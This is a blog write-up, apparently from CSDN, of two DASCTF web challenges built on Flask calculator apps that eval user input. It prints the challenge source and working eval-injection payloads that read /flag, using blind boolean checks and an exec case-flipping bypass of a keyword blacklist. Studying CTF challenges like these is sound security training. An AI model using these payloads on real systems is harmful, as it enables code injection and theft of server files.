安恒六月赛DASCTF(web1,2)

最新推荐文章于 2024-04-21 11:16:34 发布
最新推荐文章于 2024-04-21 11:16:34 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: 安恒月赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/106976146
版权

安恒六月赛DASCTF(web1,2)

简单的计算题-1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
from config import black_list,create
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)

## flag is in /flag try to get it

@app.route('/', methods=['GET', 'POST'])
def index():

    def filter(string):
        for black_word in black_list:
            if black_word in string:
                return "hack"
        return string

    if request.method == 'POST':
        input = request.form['input']
        create_question = create()
        input_question = session.get('question')
        session['question'] = create_question
        if input_question==None:
            return render_template('index.html', answer="Invalid session please try again!", question=create_question)
        if filter(input)=="hack":
            return render_template('index.html', answer="hack", question=create_question)
        try:
            calc_result = str((eval(input_question + "=" + str(input))))
            if calc_result == 'True':
                result = "Congratulations"
            elif calc_result == 'False':
                result = "Error"
            else:
                result = "Invalid"
        except:
            result = "Invalid"
        return render_template('index.html', answer=result,question=create_question)

    if request.method == 'GET':
        create_question = create()
        session['question'] = create_question
        return render_template('index.html',question=create_question)

@app.route('/source')
def source():
        return open("app.py", "r").read()

if __name__ == '__main__':
app.run(host="0.0.0.0", debug=False)

问题会放到session中,然后核对是否等于input的数值
在这里插入图片描述

有模板函数,但输入并不会直接拼接进去,是根据input输入eval执行后的结果返回对应的result,但eval能直接执行命令,所以选择盲注。题目过滤了(os,or,system等)
input=-573458*(open("/flag", “r”).read(7) == str(‘DASCTF{’))

或者
input=-573458*(open("/flag", “r”).read()[1] == str(‘A’))
在这里插入图片描述
input=-573458*(open("/flag", “r”).read(40) == str(‘DASCTF{53a6ee70a3e8c013e2b1dbb2b926d3b2}’))
在这里插入图片描述
python脚本盲注或者Burp intruder模块半自动

简单的计算题-2

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
from config import black_list,create
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)

## flag is in /flag try to get it

@app.route('/', methods=['GET', 'POST'])
def index():

    def filter(string):
        for black_word in black_list:
            if black_word in string:
                return "hack"
        return string

    if request.method == 'POST':
        input = request.form['input']
        create_question = create()
        input_question = session.get('question')
        session['question'] = create_question
        if input_question == None:
            return render_template('index.html', answer="Invalid session please try again!", question=create_question)
        if filter(input)=="hack":
            return render_template('index.html', answer="hack", question=create_question)
        calc_str = input_question + "=" + str(input)
        try:
            calc_result = str((eval(calc_str)))
        except Exception as ex:
            calc_result = "Invalid"
        return render_template('index.html', answer=calc_result,question=create_question)

    if request.method == 'GET':
        create_question = create()
        session['question'] = create_question
        return render_template('index.html',question=create_question)

@app.route('/source')
def source():
        return open("app.py", "r").read()

if __name__ == '__main__':
app.run(host="0.0.0.0", debug=False)

这题把read也给ban了,但是看代码可以得知,这题直接把eval执行的结果回显了
在这里插入图片描述

尝试大小写绕过,本地测试成功
在这里插入图片描述
eval也被过滤了,改用exec,但注意exec的返回值为none
所以得影响一个能回显到页面上或者返回在cookie中的的参数,测试发现 session[‘question’]是可用的
在这里插入图片描述
在这里插入图片描述

input=1022569 and exec(""“s='a3=open(”/flag", “r”).READ()’;a2=s.lower();exec(a2);session[‘question’]=a3""")
在这里插入图片描述
Base64解码得到flag
在这里插入图片描述

Arnoldqqq
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DASCTF六月部分题复现
weixin_44145820的博客
08-13 1068
目录PWNsecreteasyheap PWN secret 这题当时比的时候找到了先知上的一篇文章,研究了它的代码想在本题复现,但是总是不成功 看了大佬们的博客,发现这题居然这么简单Orz 简单说一下这题的原理: 本题先close了stdout,然后给写两字节和0x18字节的机会,之后close stderr和stdin 那么我们先分析一下fclose的源码,其核心函数是位于/libio/iofclose.c的_IO_new_fclose函数,其大致流程是:首先检查文件结构体指针,之后使用_IO_
六月DASCTFre方面wp
weixin_43990313的博客
06-28 378
T0p Gear 题目是upx壳,先用upx脱壳后载入ida。 观察程序的逻辑。有三个关键check,分别进入观察逻辑。 check1(其中sub_401080是相等的比较函数)这段flag的结果就是字符串(注意字符串的顺序) 其实看汇编代码更直接一些。 check2,这是一个aes加密,对字符串进行加密然后和输入的数据进行比较。 可以直接在call这一位置下断,观察rax寄存器的情况。gdb调试下断即可。 查看rax寄存器的内容,得到字符串。 check3同理 拼接起来得到fag c92bb
BUUCTF-练习场-WEB-第二部分(8道)
weixin_45908624的博客
03-30 329
BUUCTF-Web-8道
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 863
简单
2020年DASCTF六月团队 REVERSE Magia
hhcjl的博客
06-30 714
2020年DASCTF六月团队 REVERSE Magia2020年DASCTF六月团队 REVERSE MagiaIDA静态分析字符串输入检测字符间逻辑检测继续IDA分析利用XDBG进行动态分析 2020年DASCTF六月团队 REVERSE Magia IDA静态分析 程序为32位Windows程序,拖入IDA3Pro分析 字符串输入检测 输入字符串后进入sub_403290()函数检测,满足以下条件: 1.字符串必须为32位。 2、第1、2、3、4、32位分别为‘N’、‘e’、‘p’、
Dasctf 6月其余pwn WP
qq_31457355的博客
11-01 565
copy: 这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述 exp: #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import os from pwn import * #from LibcSearcher import LibcSearcher # context.log_level = 'debu
安恒四月月DASCTF-Misc Write Up
阿鱼的小世界
04-29 2433
参考资料 http://www.ga1axy.top/index.php/archives/28/ https://shimo.im/docs/WjVJd6pqy8dWxd6w/ Misc 6G还远吗(签到题) 开始点击下载后发现文件接近3.45G,而且下载速度贼慢,上面显示下完需要7.8个小时不过我们比时间只有四个小时 于是现将文件的部分下载下来载入010中可以看到flag 涉...
六月
cmqwan的博客
06-30 7289
哎。六月就这么过去了。   又是一个月没写博客
安恒明鉴web漏洞扫描器
01-20
安恒明鉴Web漏洞扫描器】是一款专业的网络安全工具,主要针对Web应用程序的安全性进行深度检测,以发现潜在的漏洞并帮助企业或个人提前预防网络攻击。这款扫描器使用了先进的扫描技术和策略,能够自动化地执行多种...
安恒杯月题目参源码+项目说明.zip
01-23
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞项目学习资料,作为参考学习借鉴。 ...安恒杯月题目参源码+项目说明.zip
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
安恒ctf misc crypto 培训资料合集
10-06
安恒ctf misc crypto合集 加解密rsa 隐写 图片隐写 现代密码 古典密码 ppt
SimpleCalc:这是一个非常简单的计算器,它使用基本运算符和浮点数
03-07
简单计算 这是一个非常简单的计算器,它使用基本运算符和浮点数。 使用:python3 Calc.py
2018-10月安恒逆向题目
10-29
2018年10月安恒逆向题目。
安恒CTF培训资料 PDF.7z
10-19
WEB,AWD,杂项,密码学,逆向,二进制
CTF中的常见题型
11-13
CTF中的常见题型目录,给初学者提供学习方向。CTF(Capture The Flag)中文一般译作夺旗,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比形式。
安恒信息明御WEB应用防火墙产品白皮书.doc
11-09
安恒信息明御WEB应用防火墙产品白皮书.doc
流量分析——安恒科技(八月CTF
JohnnyG2000的博客
01-13 5218
这里写目录标题流量分析一、题目背景二、关卡列表三、解题过程1、黑客使用的扫描器2、黑客扫描到的登陆后台3、黑客登陆web后台所使用的账号密码(形式:username/password)4、黑客上传的webshell文件名、内容以及内容的base编码5、黑客找到的robots.txt中的flag6、黑客找到的数据库密码7、黑客在数据库中找到的hash_code8、黑客破解账号ijnu@test.com得到的密码9、黑客攻击的web服务器的网卡配置和网卡内网IP10、黑客登陆了mail系统所使用的账号和密码(形
struts2漏洞利用率工具 安恒内部版
11-17
struts2漏洞利用率工具是安恒内部开发的一款工具,主要用于检测和利用struts2框架中的漏洞。该工具可以帮助安全研究人员和安全工程师快速、准确地发现和利用struts2框架中存在的漏洞,从而及时修复和加固系统的安全性。 安恒内部版的struts2漏洞利用率工具具有以下特点:首先,它集成了最新的struts2漏洞利用技术和利用工具,能够全面、深入地检测和利用各种类型的struts2漏洞。其次,该工具具有简单易用、快速高效的特点,用户可以通过简单的操作就能够完成对struts2漏洞的检测和利用。此外,安恒内部版的struts2漏洞利用率工具还具有高度的定制化和灵活性,用户可以根据需要进行个性化配置和定制功能。 通过使用安恒内部版的struts2漏洞利用率工具,企业可以及时了解系统中struts2框架存在的漏洞情况,及时采取措施修复漏洞,从而提升系统的安全性和稳定性。同时,该工具还可以帮助企业建立健全的漏洞管理和应急响应机制,加强对struts2漏洞的防范和管控,确保系统安全运行。 总之,安恒内部版的struts2漏洞利用率工具是一款功能强大、易用灵活的安全工具,对于企业提升系统安全性和应对潜在威胁具有重要意义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值